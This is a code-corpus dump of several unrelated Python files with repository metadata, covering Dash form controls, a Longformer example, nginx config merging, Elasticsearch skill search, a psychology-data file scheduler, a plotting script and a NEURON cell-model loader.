| 36.005222 | 78 | 0.570631 | 2,136 | 13,790 | 3.645599 | 0.1353 | 0.01053 | 0.018492 | 0.033903 | 0.527931 | 0.498138 | 0.458713 | 0.453833 | 0.442789 | 0.435726 | 0 | 0.015483 | 0.283394 | 13,790 | 382 | 79 | 36.099476 | 0.772516 | 0.266715 | 0 | 0.557252 | 0 | 0 | 0.077495 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038168 | false | 0 | 0.026718 | 0 | 0.09542 | 0.141221 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7422355175454fcfb89f48ad2d00d9c5dd1fa0e | 2,532 | py | Python | dash_website/utils/controls.py | SamuelDiai/Dash-Website | e064e432f14a86de1b54cf31ab311997c5643129 | [
"MIT"
] | null | null | null | dash_website/utils/controls.py | SamuelDiai/Dash-Website | e064e432f14a86de1b54cf31ab311997c5643129 | [
"MIT"
] | null | null | null | dash_website/utils/controls.py | SamuelDiai/Dash-Website | e064e432f14a86de1b54cf31ab311997c5643129 | [
"MIT"
] | null | null | null | import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
def get_options_from_list(list_):
list_label_value = []
for value in list_:
list_label_value.append({"value": value, "label": value})
return list_label_value
def get_options_from_dict(dict_):
list_label_value = []
for key_value, label in dict_.items():
list_label_value.append({"value": key_value, "label": label})
return list_label_value
def get_item_radio_items(id, items, legend, from_dict=True, value_idx=0):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
return dbc.FormGroup(
[
html.P(legend),
dcc.RadioItems(
id=id,
options=options,
value=options[value_idx]["value"],
labelStyle={"display": "inline-block", "margin": "5px"},
),
]
)
def get_drop_down(id, items, legend, from_dict=True, value=None, multi=False, clearable=False):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
if value is None:
value = options[0]["value"]
if multi and type(value) != list:
value = [value]
return dbc.FormGroup(
[
html.P(legend),
dcc.Dropdown(
id=id,
options=options,
value=value,
clearable=clearable,
multi=multi,
placeholder="Nothing is selected.",
),
]
)
def get_check_list(id, items, legend, from_dict=True, value=None):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
if value is None:
value = options[0]["value"]
return dbc.FormGroup(
[
html.P(legend),
dcc.Checklist(id=id, options=options, value=[value], labelStyle={"display": "inline-block"}),
]
)
def get_range_slider(id, min, max, legend):
return dbc.FormGroup(
[
html.P(legend),
dcc.RangeSlider(
id=id,
min=min,
max=max,
value=[min, max],
marks=dict(zip(range(min, max + 1, 5), [str(elem) for elem in range(min, max + 1, 5)])),
step=None,
),
html.Br(),
]
)
| 25.836735 | 105 | 0.554502 | 296 | 2,532 | 4.523649 | 0.233108 | 0.059746 | 0.083645 | 0.0941 | 0.584765 | 0.465273 | 0.384615 | 0.314414 | 0.212099 | 0.212099 | 0 | 0.004759 | 0.336098 | 2,532 | 97 | 106 | 26.103093 | 0.791791 | 0 | 0 | 0.455696 | 0 | 0 | 0.040284 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075949 | false | 0 | 0.037975 | 0.012658 | 0.189873 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e745fb5c2bd82701b4b6fe87fdf23d2d1913eabb | 2,333 | py | Python | hedwig/test.py | Cool-tong/covid | 389c490e60f7b854369e0600b6dfc071baceaa7e | [
"Apache-2.0"
] | 15 | 2020-06-25T21:44:41.000Z | 2022-01-14T23:41:50.000Z | hedwig/test.py | Cool-tong/covid | 389c490e60f7b854369e0600b6dfc071baceaa7e | [
"Apache-2.0"
] | 9 | 2021-03-31T19:48:34.000Z | 2022-03-12T00:34:28.000Z | hedwig/test.py | Cool-tong/covid | 389c490e60f7b854369e0600b6dfc071baceaa7e | [
"Apache-2.0"
] | 8 | 2020-09-16T10:29:14.000Z | 2022-01-16T17:53:41.000Z | # from transformers import ReformerModel, ReformerTokenizer
# import torch
#
# tokenizer = ReformerTokenizer.from_pretrained('google/reformer-crime-and-punishment')
# model = ReformerModel.from_pretrained('google/reformer-crime-and-punishment')
#
# input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
# print(input_ids.shape)
# outputs = model(input_ids)
#
# pooled_output = torch.mean(outputs[0], dim=1)
#
# last_hidden_states = outputs[0]
import torch
from longformer.longformer import Longformer, LongformerConfig
from longformer.sliding_chunks import pad_to_window_size
from transformers import RobertaTokenizer
config = LongformerConfig.from_pretrained('longformer-base-4096/')
# choose the attention mode 'n2', 'tvm' or 'sliding_chunks'
# 'n2': for regular n2 attantion
# 'tvm': a custom CUDA kernel implementation of our sliding window attention
# 'sliding_chunks': a PyTorch implementation of our sliding window attention
config.attention_mode = 'sliding_chunks'
model = Longformer.from_pretrained('longformer-base-4096/', config=config)
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
tokenizer.model_max_length = model.config.max_position_embeddings
SAMPLE_TEXT = ' '.join(['Hello world! '] * 1000) # long input document
SAMPLE_TEXT = f'{tokenizer.cls_token}{SAMPLE_TEXT}{tokenizer.eos_token}'
input_ids = torch.tensor(tokenizer.encode(SAMPLE_TEXT)).unsqueeze(0) # batch of size 1
# TVM code doesn't work on CPU. Uncomment this if `config.attention_mode = 'tvm'`
# model = model.cuda(); input_ids = input_ids.cuda()
# Attention mask values -- 0: no attention, 1: local attention, 2: global attention
attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=input_ids.device) # initialize to local attention
attention_mask[:, [1, 4, 21,]] = 2 # Set global attention based on the task. For example,
# classification: the <s> token
# QA: question tokens
# padding seqlen to the nearest multiple of 512. Needed for the 'sliding_chunks' attention
input_ids, attention_mask = pad_to_window_size(
input_ids, attention_mask, config.attention_window[0], tokenizer.pad_token_id)
output = model(input_ids, attention_mask=attention_mask)[0]
| 44.865385 | 123 | 0.753965 | 309 | 2,333 | 5.521036 | 0.398058 | 0.051583 | 0.029894 | 0.036928 | 0.179367 | 0.141852 | 0.053927 | 0 | 0 | 0 | 0 | 0.017509 | 0.143163 | 2,333 | 51 | 124 | 45.745098 | 0.835918 | 0.511787 | 0 | 0 | 0 | 0 | 0.123535 | 0.087466 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.235294 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e746b6586494198935ce54917af266b0ab3f32e9 | 7,091 | py | Python | nginx_parse_emit/utils.py | offscale/nginx-parse-emit | 29b020f62fe1bc8377f2c30689f4bb4c5777ec69 | [
"Apache-2.0",
"MIT"
] | null | null | null | nginx_parse_emit/utils.py | offscale/nginx-parse-emit | 29b020f62fe1bc8377f2c30689f4bb4c5777ec69 | [
"Apache-2.0",
"MIT"
] | null | null | null | nginx_parse_emit/utils.py | offscale/nginx-parse-emit | 29b020f62fe1bc8377f2c30689f4bb4c5777ec69 | [
"Apache-2.0",
"MIT"
] | null | null | null | from operator import itemgetter
from platform import python_version_tuple
from sys import version
if version[0] == "2":
from cStringIO import StringIO
else:
from functools import reduce
from io import StringIO
from copy import copy
from itertools import filterfalse
from os import remove, path
from string import Template
from tempfile import mkstemp
from fabric.contrib.files import exists
from fabric.operations import get, put
from nginxparser import loads, dumps, load
class DollarTemplate(Template):
delimiter = "$"
idpattern = r"[a-z][_a-z0-9]*"
def ensure_semicolon(s): # type: (str) -> str or None
if s is None:
return s
s = s.rstrip()
return s if not len(s) or s[-1] == ";" else "{};".format(s)
def _copy_or_marshal(block): # type: (str or list) -> list
return copy(block) if isinstance(block, list) else loads(block)
def merge_into(
server_name, parent_block, *child_blocks
): # type: (str, str or list, *list) -> list
parent_block = _copy_or_marshal(parent_block)
server_name_idx = -1
indicies = set()
break_ = False
for i, tier in enumerate(parent_block):
for j, statement in enumerate(tier):
for k, stm in enumerate(statement):
if statement[k][0] == "server_name" and statement[k][1] == server_name:
server_name_idx = i
indicies.add(k)
if break_:
break
elif statement[k][0] == "listen" and statement[k][1].startswith("443"):
break_ = True
if k in indicies:
break
server_name_idx += 1
if not len(indicies):
return parent_block
length = len(parent_block[-1])
if server_name_idx >= length:
server_name_idx = length - 1
parent_block[-1][server_name_idx] += list(
map(
lambda child_block: child_block[0]
if isinstance(child_block[0], list)
else loads(child_block)[0],
child_blocks,
)
)
parent_block[-1][server_name_idx] = list(
reversed(uniq(reversed(parent_block[-1][-1]), itemgetter(0)))
)
return parent_block
def merge_into_str(
server_name, parent_block, *child_blocks
): # type: (str or list, *list) -> str
return dumps(merge_into(server_name, parent_block, *child_blocks))
def upsert_by_location(
server_name, location, parent_block, child_block
): # type: (str, str or list, str or list) -> list
return merge_into(
server_name,
remove_by_location(_copy_or_marshal(parent_block), location),
child_block,
)
def remove_by_location(parent_block, location): # type: (list, str) -> list
parent_block = _copy_or_marshal(parent_block)
parent_block = list(
map(
lambda block: list(
map(
lambda subblock: list(
filterfalse(
lambda subsubblock: len(subsubblock)
and len(subsubblock[0]) > 1
and subsubblock[0][1] == location,
subblock,
)
),
block,
)
),
parent_block,
)
)
return parent_block
def _prevent_slash(s): # type: (str) -> str
return s[1:] if s.startswith("/") else s
def apply_attributes(
block, attribute, append=False
): # type: (str or list, str or list, bool) -> list
block = _copy_or_marshal(block)
attribute = _copy_or_marshal(attribute)
if append:
block[-1][-1] += attribute
else:
changed = False
for bid, _block in enumerate(block[-1]):
for sid, subblock in enumerate(_block):
if isinstance(subblock[0], list):
block[-1][bid] = attribute + [block[-1][bid][sid]]
changed = True
break
if not changed:
block[-1][-1] += attribute
# TODO: Generalise these lines to a `remove_duplicates` or `remove_consecutive_duplicates` function
prev_key = None
subseq_removed = []
if not isinstance(block[0][1], list):
return block
block[0][1].reverse()
for subblock in block[0][1]:
if (
prev_key is not None
and prev_key == subblock[0]
and prev_key in ("server_name", "listen")
):
continue
subseq_removed.append(subblock)
prev_key = subblock[0]
subseq_removed.reverse()
block[0][1] = subseq_removed
return block
def upsert_upload(new_conf, name="default", use_sudo=True):
conf_name = "/etc/nginx/sites-enabled/{nginx_conf}".format(nginx_conf=name)
if not conf_name.endswith(".conf") and not exists(conf_name):
conf_name += ".conf"
# cStringIO.StringIO, StringIO.StringIO, TemporaryFile, SpooledTemporaryFile all failed :(
tempfile = mkstemp(name)[1]
get(remote_path=conf_name, local_path=tempfile, use_sudo=use_sudo)
with open(tempfile, "rt") as f:
conf = load(f)
new_conf = new_conf(conf)
remove(tempfile)
sio = StringIO()
sio.write(dumps(new_conf))
return put(sio, conf_name, use_sudo=use_sudo)
def get_parsed_remote_conf(
conf_name, suffix="nginx", use_sudo=True
): # type: (str, str, bool) -> [str]
if not conf_name.endswith(".conf") and not exists(conf_name):
conf_name += ".conf"
# cStringIO.StringIO, StringIO.StringIO, TemporaryFile, SpooledTemporaryFile all failed :(
tempfile = mkstemp(suffix)[1]
get(remote_path=conf_name, local_path=tempfile, use_sudo=use_sudo)
with open(tempfile, "rt") as f:
conf = load(f)
remove(tempfile)
return conf
def ensure_nginxparser_instance(conf_file): # type: (str) -> [[[str]]]
if isinstance(conf_file, list):
return conf_file
elif hasattr(conf_file, "read"):
return load(conf_file)
elif path.isfile(conf_file):
with open(conf_file, "rt") as f:
return load(f)
else:
return loads(conf_file)
def uniq(iterable, key=lambda x: x):
"""
Remove duplicates from an iterable. Preserves order.
:type iterable: Iterable[Ord => A]
:param iterable: an iterable of objects of any orderable type
:type key: Callable[A] -> (Ord => B)
:param key: optional argument; by default an item (A) is discarded
if another item (B), such that A == B, has already been encountered and taken.
If you provide a key, this condition changes to key(A) == key(B); the callable
must return orderable objects.
"""
# Enumerate the list to restore order lately; reduce the sorted list; restore order
def append_unique(acc, item):
return acc if key(acc[-1][1]) == key(item[1]) else acc.append(item) or acc
srt_enum = sorted(enumerate(iterable), key=lambda item: key(item[1]))
return [item[1] for item in sorted(reduce(append_unique, srt_enum, [srt_enum[0]]))]
| 30.433476 | 103 | 0.608236 | 911 | 7,091 | 4.566411 | 0.218441 | 0.052885 | 0.015144 | 0.0125 | 0.202644 | 0.182692 | 0.174038 | 0.160096 | 0.110577 | 0.110577 | 0 | 0.010848 | 0.285009 | 7,091 | 232 | 104 | 30.564655 | 0.809665 | 0.158652 | 0 | 0.233918 | 0 | 0 | 0.023354 | 0.006262 | 0 | 0 | 0 | 0.00431 | 0 | 1 | 0.076023 | false | 0 | 0.081871 | 0.02924 | 0.28655 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e74a548d5928286d5e89cff8efabd8323a997dc8 | 3,006 | py | Python | tests/skillsearch/clients.py | allenai/alexafsm | 0c2e8842ddbb4a34ac64a5139e7febee3b28889a | [
"Apache-2.0"
] | 108 | 2017-05-11T22:33:39.000Z | 2022-03-04T03:04:51.000Z | tests/skillsearch/clients.py | allenai/alexafsm | 0c2e8842ddbb4a34ac64a5139e7febee3b28889a | [
"Apache-2.0"
] | null | null | null | tests/skillsearch/clients.py | allenai/alexafsm | 0c2e8842ddbb4a34ac64a5139e7febee3b28889a | [
"Apache-2.0"
] | 17 | 2017-05-12T23:26:38.000Z | 2020-04-20T19:39:54.000Z | """Client that handles query to elasticsearch"""
import string
from typing import List
from elasticsearch_dsl import Search
from alexafsm.test_helpers import recordable as rec
from elasticsearch_dsl.response import Response
from tests.skillsearch.skill_settings import SkillSettings
from tests.skillsearch.skill import Skill, INDEX
from tests.skillsearch.dynamodb import DynamoDB
es_search: Search = Search(index=INDEX).source(excludes=['html'])
def get_es_skills(query: str, top_n: int, category: str = None, keyphrase: str = None) -> (int, List[Skill]):
"""Return the total number of hits and the top_n skills"""
result = get_es_results(query, category, keyphrase).to_dict()
return result['hits']['total'], [Skill.from_es(h) for h in result['hits']['hits'][:top_n]]
def recordable(func):
def _get_record_dir():
return SkillSettings().get_record_dir()
def _is_playback():
return SkillSettings().playback
def _is_record():
return SkillSettings().record
return rec(_get_record_dir, _is_playback, _is_record)(func)
@recordable
def get_es_results(query: str, category: str, keyphrase: str) -> Response:
results = _get_es_results(query, category, keyphrase, strict=True)
if len(results.hits) == 0:
# relax constraints a little
return _get_es_results(query, category, keyphrase, strict=False)
else:
return results
def _get_es_results(query: str, category: str, keyphrase: str, strict: bool) -> Response:
skill_search = es_search
if category:
skill_search = skill_search.query('match',
category=string.capwords(category)
.replace(' And ', ' & ')
.replace('Movies & Tv', 'Movies & TV'))
if keyphrase:
skill_search = skill_search.query('match', keyphrases=keyphrase)
if query:
operator = 'and' if strict else 'or'
skill_search = skill_search.query('multi_match',
query=query,
fields=['name', 'description', 'usages', 'keyphrases'],
minimum_should_match='50%',
operator=operator) \
.highlight('description', order='score', pre_tags=['*'], post_tags=['*']) \
.highlight('title', order='score', pre_tags=['*'], post_tags=['*']) \
.highlight('usages', order='score', pre_tags=['*'], post_tags=['*'])
return skill_search.execute()
@recordable
def get_user_info(user_id: str, request_id: str) -> dict: # NOQA
"""Get information of user with user_id from dynamodb. request_id is simply there so that we can
record different responses from dynamodb for the same user during playback"""
return DynamoDB().get_user_info(user_id)
@recordable
def register_new_user(user_id: str):
DynamoDB().register_new_user(user_id)
| 37.575 | 109 | 0.633733 | 355 | 3,006 | 5.157746 | 0.31831 | 0.048061 | 0.032769 | 0.046423 | 0.254506 | 0.198252 | 0.131076 | 0.050246 | 0.050246 | 0.050246 | 0 | 0.001335 | 0.252162 | 3,006 | 79 | 110 | 38.050633 | 0.813167 | 0.098802 | 0 | 0.056604 | 0 | 0 | 0.057292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.169811 | false | 0 | 0.150943 | 0.056604 | 0.490566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e74bee176de16cba930d5ae5c1c4a6c4a4161b92 | 9,380 | py | Python | pypsych/schedule.py | janmtl/pypsych | 1c606342dbdb984bc06aa9fd26963f3ce0a378b1 | [
"BSD-3-Clause"
] | null | null | null | pypsych/schedule.py | janmtl/pypsych | 1c606342dbdb984bc06aa9fd26963f3ce0a378b1 | [
"BSD-3-Clause"
] | null | null | null | pypsych/schedule.py | janmtl/pypsych | 1c606342dbdb984bc06aa9fd26963f3ce0a378b1 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Includes the Schedule class, validation functions, and compilation functions
for compiling a schedule of files to process.
Methods:
compile: shortcut for validating the loaded configuration, then
performing the search, and _resolve functions
load: load the schedule.yaml file into a dictionary
get_file_paths: return a dictionary of files for a given subject, task, and
data source.
search: search the data_path for all files matching the patterns.
validate_schema: validate yaml contents against the schedule configuration
schema.
validate_data_source_names: validates that the data source names contained
in the configuration match a given list of possible data source names
validate_patterns: validates that the regex patterns return named fields
matching a list of required named fields
Configuration schema (YAML):
{task_name (str):
{data_source_name (str):
{filetype (str): pattern (str)}
}
}
"""
from schema import Schema
import os
import re
import pandas as pd
import numpy as np
import functools
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
# TODO(janmtl): Schedule should extend pd.DataFrame
class Schedule(object):
"""
An object for scheduling files to be processed by data sources.
Args:
path (str): path to YAML schedule configuration file.
Attributes:
path (str): path to YAML schedule configuration file.
raw (dict): the dictionary resulting from the YAML configuration.
sched_df (pands.DataFrame): a Pandas DataFrame listing all files found
"""
def __init__(self, raw):
self.raw = self.validate_schema(raw)
self.sched_df = None
self.subjects = []
self.valid_subjects = []
self.invalid_subjects = []
@memoize
def get_subschedule(self, task_name, data_source_name):
"""Fetches the schedule for a given task and data source."""
return self.raw[task_name][data_source_name]
def compile(self, data_paths):
"""Search the data path for the files to add to the schedule."""
# TODO(janmtl): this should accept globs
# TODO(janmtl): should be able to pass a list of excluded subjects
if not isinstance(data_paths, list):
data_paths = list(data_paths)
files_df = self.search(self.raw, data_paths)
self.sched_df = self._resolve(files_df)
self.sched_df[['Subject', 'Task_Order']] = \
self.sched_df[['Subject', 'Task_Order']].astype(np.int64)
self.subjects = list(np.unique(self.sched_df['Subject']))
# TODO(janmtl): The function that checks the integrity of a subject's data
# should also return which subjects are broken and why
def validate_files(self):
"""Iterate over subjects and make sure that they all have all the files
they need."""
cf = (self.sched_df.pivot_table(index='Subject',
columns=['Data_Source_Name',
'Task_Name',
'File'],
values='Path',
aggfunc=lambda x: len(x)) == 1)
return cf
def remove_subject(self, subject_id):
self.sched_df = self.sched_df[self.sched_df['Subject'] != subject_id]
if subject_id in self.subjects:
self.subjects.remove(subject_id)
def isolate_subjects(self, subject_ids):
self.sched_df = self.sched_df[self.sched_df['Subject']
.isin(subject_ids)]
self.subjects = subject_ids
def isolate_tasks(self, task_names):
self.sched_df = self.sched_df[self.sched_df['Task_Name']
.isin(task_names)]
def isolate_data_sources(self, data_source_names):
self.sched_df = self.sched_df[self.sched_df['Data_Source_Name']
.isin(data_source_names)]
def get_file_paths(self, subject_id, task_name, data_source_name):
"""Return all a dictionary of all files for a given subject, task,
and data source."""
if self.sched_df.empty:
raise Exception('Schedule is empty, try Schedule.compile(path).')
sub_df = self.sched_df[
(self.sched_df['Subject'] == subject_id)
& (self.sched_df['Task_Name'] == task_name)
& (self.sched_df['Data_Source_Name'] == data_source_name)
]
if sub_df.empty:
raise Exception(
'({}, {}, {}) not found in schedule.'.format(subject_id,
task_name,
data_source_name)
)
list_of_files = sub_df[['File', 'Path']].to_dict('records')
files_dict = {ds['File']: ds['Path'] for ds in list_of_files}
return files_dict
@staticmethod
def search(raw, data_paths):
"""Search the data paths for matching file patterns and return a pandas
DataFrame of the results."""
files_dict = []
for task_name, task in raw.iteritems():
for data_source_name, patterns in task.iteritems():
for pattern_name, pattern in patterns.iteritems():
for data_path in data_paths:
for root, _, files in os.walk(data_path):
for filepath in files:
file_match = re.match(pattern, filepath)
if file_match:
fd = file_match.groupdict()
fd['Task_Name'] = task_name
fd['Data_Source_Name'] = data_source_name
fd['File'] = pattern_name
fd['Path'] = os.path.join(root, filepath)
files_dict.append(fd)
files_df = pd.DataFrame(files_dict)
files_df.fillna({'Task_Order': 0}, inplace=True)
files_df[['Subject', 'Task_Order']] = \
files_df[['Subject', 'Task_Order']].astype(np.int64)
return files_df
@staticmethod
def _resolve(files_df):
"""
Resolve any files that matched multiple Task_Order values and
return a subset of the Data Frame.
Args:
files_df (pandas.DataFrame): a DataFrame resulting from
Schedule.search().
"""
counter = files_df.groupby(['Subject',
'Data_Source_Name',
'File',
'Task_Name'])['Task_Order'].count()
maps = counter[counter == 1]
maps = maps.reset_index()
maps.drop('Task_Order', axis=1, inplace=True)
orders = pd.merge(maps, files_df)[['Subject',
'Task_Name',
'Task_Order']]
orders.drop_duplicates(inplace=True)
sched_df = pd.merge(orders, files_df)[['Subject',
'Task_Name',
'Task_Order',
'File',
'Data_Source_Name',
'Path']]
return sched_df
@staticmethod
def validate_schema(raw):
"""Validate the schedule dictionary against the schema described
above."""
schema = Schema({str: {str: {str: str}}})
return schema.validate(raw)
@staticmethod
def validate_data_source_names(raw, data_source_names):
"""
Validate that all data source names are contained in the
data_source_names list.
Args:
data_source_names (list(str)): list of valid data source names
implemented in pypsych.
"""
for _, task in raw.iteritems():
for data_source_name in task.keys():
if data_source_name not in data_source_names:
raise Exception(
'Schedule could not validate data source ',
data_source_name
)
@staticmethod
def validate_patterns(raw):
"""Validate that all file pattern regex expressions yield Task_Order
and Subject fields."""
for _, task in raw.iteritems():
for _, data_source in task.iteritems():
for _, pattern in data_source.iteritems():
compiled_pattern = re.compile(pattern)
for group_name in compiled_pattern.groupindex.keys():
if group_name not in ['Task_Order', 'Subject']:
raise Exception(
'Schedule could not validate pattern ',
pattern
)
| 38.921162 | 79 | 0.552452 | 1,049 | 9,380 | 4.753098 | 0.203051 | 0.070197 | 0.050742 | 0.02868 | 0.224027 | 0.170678 | 0.13197 | 0.094665 | 0.056358 | 0.041115 | 0 | 0.001502 | 0.361301 | 9,380 | 240 | 80 | 39.083333 | 0.830746 | 0.269403 | 0 | 0.122302 | 0 | 0 | 0.084354 | 0.003477 | 0 | 0 | 0 | 0.008333 | 0 | 1 | 0.115108 | false | 0 | 0.043165 | 0 | 0.223022 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e74d4d6162ae8c2a70fd86d11e2efc802d6df3be | 1,202 | py | Python | figthesis/figshape.py | Gattocrucco/sipmfilter | 74215d6c53b998808fc6c677b46030234d996bdf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | figthesis/figshape.py | Gattocrucco/sipmfilter | 74215d6c53b998808fc6c677b46030234d996bdf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | figthesis/figshape.py | Gattocrucco/sipmfilter | 74215d6c53b998808fc6c677b46030234d996bdf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | import numpy as np
from matplotlib import pyplot as plt
import figlatex
import template
import afterpulse_tile21
styles = {
5.5: dict(color='#f55'),
7.5: dict(hatch='//////', facecolor='#0000'),
9.5: dict(edgecolor='black', facecolor='#0000'),
}
fig, ax = plt.subplots(num='figshape', clear=True, figsize=[7, 3.3])
for vov, style in styles.items():
ap21 = afterpulse_tile21.AfterPulseTile21(vov)
templates = []
for files in ap21.filelist:
file = files['templfile']
templ = template.Template.load(file)
kw = dict(timebase=1, aligned=True, randampl=False)
y, = templ.generate(templ.template_length, [0], **kw)
templates.append(y)
m = np.mean(templates, axis=0)
s = np.std(templates, axis=0, ddof=1)
norm = np.min(m)
ax.fill_between(np.arange(len(m)), (m - s) / norm, (m + s) / norm, label=f'{vov} V', zorder=2, **style)
ax.minorticks_on()
ax.grid(True, 'major', linestyle='--')
ax.grid(True, 'minor', linestyle=':')
ax.legend(title='Overvoltage')
ax.set_xlabel('Sample number after trigger @ 1 GSa/s')
ax.set_xlim(0, 1000)
fig.tight_layout()
fig.show()
figlatex.save(fig)
| 24.04 | 107 | 0.62396 | 170 | 1,202 | 4.364706 | 0.570588 | 0.020216 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042887 | 0.204659 | 1,202 | 49 | 108 | 24.530612 | 0.733264 | 0 | 0 | 0 | 0 | 0 | 0.091514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.151515 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e74e18233e68e6e6e2b6b4650e8d71aa16535204 | 5,559 | py | Python | eFELunit/utils.py | appukuttan-shailesh/eFELunit | 055385254875249293da72c1daf2d489033cb9da | [
"BSD-3-Clause"
] | null | null | null | eFELunit/utils.py | appukuttan-shailesh/eFELunit | 055385254875249293da72c1daf2d489033cb9da | [
"BSD-3-Clause"
] | null | null | null | eFELunit/utils.py | appukuttan-shailesh/eFELunit | 055385254875249293da72c1daf2d489033cb9da | [
"BSD-3-Clause"
] | null | null | null | """
Module for loading BluePyOpt optimized model files
"""
import os
import sciunit
from neuronunit.capabilities import ReceivesSquareCurrent, ProducesMembranePotential, Runnable
from neuron import h
import neo
from quantities import ms
import zipfile
import json
import collections
class CellModel(sciunit.Model,
ReceivesSquareCurrent,
ProducesMembranePotential,
Runnable):
def __init__(self, model_path=None, model_name=None, run_alerts=False):
# `model_path` is the path to the model's directory
if not os.path.isdir(model_path):
raise IOError("Invalid model path: {}".format(model_path))
if not model_name:
file_name = os.path.basename(model_path)
model_name = file_name.split(".")[0]
self.model_name = model_name
self.base_path = model_path
self.owd = os.getcwd() # original working directory saved to return later
self.run_alerts = run_alerts
self.load_mod_files()
self.load_cell_hoc()
# get model template name
# could also do this via other JSON, but morph.json seems dedicated for template info
with open(os.path.join(self.base_path, "config", "morph.json")) as morph_file:
model_template = list(json.load(morph_file, object_pairs_hook=collections.OrderedDict).keys())[0]
# access model config info
with open(os.path.join(self.base_path, "config", "parameters.json")) as params_file:
params_data = json.load(params_file, object_pairs_hook=collections.OrderedDict)
# extract v_init and celsius (if available)
v_init = None
celsius = None
try:
for item in params_data[model_template]["fixed"]["global"]:
# would have been better if info was stored inside a dict (rather than a list)
if "v_init" in item:
item.remove("v_init")
v_init = float(item[0])
if "celsius" in item:
item.remove("celsius")
celsius = float(item[0])
except:
pass
if v_init == None:
h.v_init = -70.0
print("Could not find model specific info for `v_init`; using default value of {} mV".format(str(h.v_init)))
else:
h.v_init = v_init
if celsius == None:
h.celsius = 34.0
print("Could not find model specific info for `celsius`; using default value of {} degrees Celsius".format(str(h.celsius)))
else:
h.celsius = celsius
self.cell = getattr(h, model_template)(os.path.join(str(self.base_path), "morphology"))
self.iclamp = h.IClamp(0.5, sec=self.cell.soma[0])
self.vm = h.Vector()
self.vm.record(self.cell.soma[0](0.5)._ref_v)
sciunit.Model.__init__(self, name=model_name)
def load_mod_files(self):
os.chdir(self.base_path)
libpath = "x86_64/.libs/libnrnmech.so.0"
os.system("nrnivmodl mechanisms") # do nrnivmodl in mechanisms directory
if not os.path.isfile(os.path.join(self.base_path, libpath)):
raise IOError("Error in compiling mod files!")
h.nrn_load_dll(str(libpath))
os.chdir(self.owd)
def load_cell_hoc(self):
with open(os.path.join(self.base_path, self.model_name+'_meta.json')) as meta_file:
meta_data = json.load(meta_file, object_pairs_hook=collections.OrderedDict)
best_cell = meta_data["best_cell"]
self.hocpath = os.path.join(self.base_path,"checkpoints",str(best_cell))
if os.path.exists(self.hocpath):
print("Model = {}: using (best cell) {}".format(self.model_name,best_cell))
else:
self.hocpath = None
for filename in os.listdir(os.path.join(self.base_path, "checkpoints")):
if filename.startswith("cell") and filename.endswith(".hoc"):
self.hocpath = os.path.join(self.base_path, "checkpoints", filename)
print("Model = {}: cell.hoc not found in /checkpoints; using {}".format(self.model_name,filename))
break
if not os.path.exists(self.hocpath):
raise IOError("No appropriate .hoc file found in /checkpoints")
h.load_file(str(self.hocpath))
